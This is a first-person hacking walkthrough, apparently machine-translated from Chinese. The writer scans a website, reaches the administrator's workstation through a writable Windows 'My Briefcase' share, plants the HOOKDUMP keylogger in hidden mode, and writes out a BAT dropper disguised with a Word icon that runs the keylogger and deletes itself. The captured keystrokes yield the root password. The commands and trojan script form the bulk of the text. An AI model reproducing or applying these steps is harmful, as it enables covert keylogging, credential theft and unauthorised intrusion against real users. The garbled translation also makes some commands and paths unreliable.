I found a website, which is a regular intrusion. Well, its FINGER is on, so I compiled a SHELL and the aaa account tried zzz (by the way, this is an online rule I found, that is, the length of the account is proportional to the strength of the password. If an account has only two or three digits long, the password is generally very simple, and vice versa, so it is also called the owner's theorem ), as a result, an account does not exist. I did not try again. Because I was attracted by the port opened by it, and it opened WWW, I don't believe it won't go wrong. Five kinds of CGI and WWW scanners were scanned for a total of 300 or 400 common errors. It hardly exists. Check the root information:
Finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory:/Shell:/bin/sh
Last login Fri Jul 28 on ttyp0 from 202. xx
No Plan.
Root often comes. The 202. xx is his workstation. Will you see something from there?
Net view \ 202. xx
Shared resources at \ 202. xx
Sharename Type Comment
X
X
My briefcase
The command was completed successfully.
The "file and printer sharing" service on WINDOWS is easy for many people to take lightly. This root is no exception. It would be nice if its drive C is shared and writable, but it is a dream. Now, no shared directory is the root directory, and no D Drive is available. Don't worry. Come on. The folders dropped by x are useless and cannot be written. There are all original English files in the folder. This root is quite good. "My Briefcase" attracted my attention. This is a tool used to synchronize data on different machines. Obviously, this root often updates the home page on the host, sometimes it is compiled on your own machine, sometimes on the host ...... So it is very important that the sharing of "My Briefcase" is generally writable!
Then let me go in.
> Net use I: \ 202. xx
> I:
> Echo asdf> temp.txt
Yes, it is indeed writable.
> Del temp.txt
No trace-hacker habits.
> Dir/od/p
Let's look at something ...... What is that in the second row? “X .doc "! It is the plan. Since it is a plan, it cannot be written and lost. It will certainly open it again-at least COPY the plan for the next month:->
It's time to start. My goal is to let it hit my trap and run my hidden Trojan next time. I am using a keyboard recording software HOOKDUMP this time. I think it is quite good, affordable, and sufficient ...... Sorry, I'm used to it. It should not only record all the keys, but also record what programs are opened or closed, what buttons are pressed, and what menus have been used ...... In short, its records let you stand behind him and watch him operate the computer as detailed as you are. Why are you installing so many Trojans? Do you know that China's glaciers, netspy, and foreign netbus and BO are all listed as the number one targets of anti-virus software, and it is impossible to install anti-virus software on a root machine? It's still HOOKDUMP. It's small and inconspicuous. But if you use it all, you will lose the chance to use it ......
> Copy hookdump. * I:
Add: Compile the hookdump. ini file before uploading, and set it to a hidden mode for running. Otherwise, a large window will pop up on the screen of the root user .......
Then compile a BAT file with the same name on your machine: X-month work plan. BAT
> Edit c: X-month work plan. BAT
@ Echo off
Hookdump
Attrib-h xmonth Work Plan .doc
C: Program FilesMicrosoftOfficeWinword x .doc
Attrib-h temp. bat
Del temp. pif
Del temp. bat
See it, right? After the root node runs the BAT file, it actually runs the trojan first, then calls the WINWORD file to open the file it wants to open, and then deletes itself. Maybe it has different WINWORD locations on the machine, the call will fail, but it doesn't matter. BAT will immediately delete it and he will think it is his own misoperation.
At this time, the root directory of your C drive has such a BAT file. It is a square icon, which is very different from that of the WORD file. How can root run it? It doesn't matter. Right-click the file, click Properties, and select "change icon" in the "program" column? The WORD icon is in your machine C: Program FilesMicrosoftOffice. Change "run" to "minimal", and tick "close upon exit" to ensure that there is no indication at runtime. In fact, this BAT file is changed to two, and another PIF file is its icon.
Upload these two files:
> Copy X monthly work plan. bat I:
> Copy X monthly work plan. pif I:
Then, it hides both its files and its own files:
> Attrib + h xmonth Work Plan .doc
> Attrib + h X monthly work plan. bat
In this way, there is only one WORD icon identical to the original one in the root "briefcase". He never dreamed that it had changed to a BAT file. Then we can take a breath and let us wait ......
A few days later, I went to this workstation, took down the recorded key record, found out the root password, and entered the host.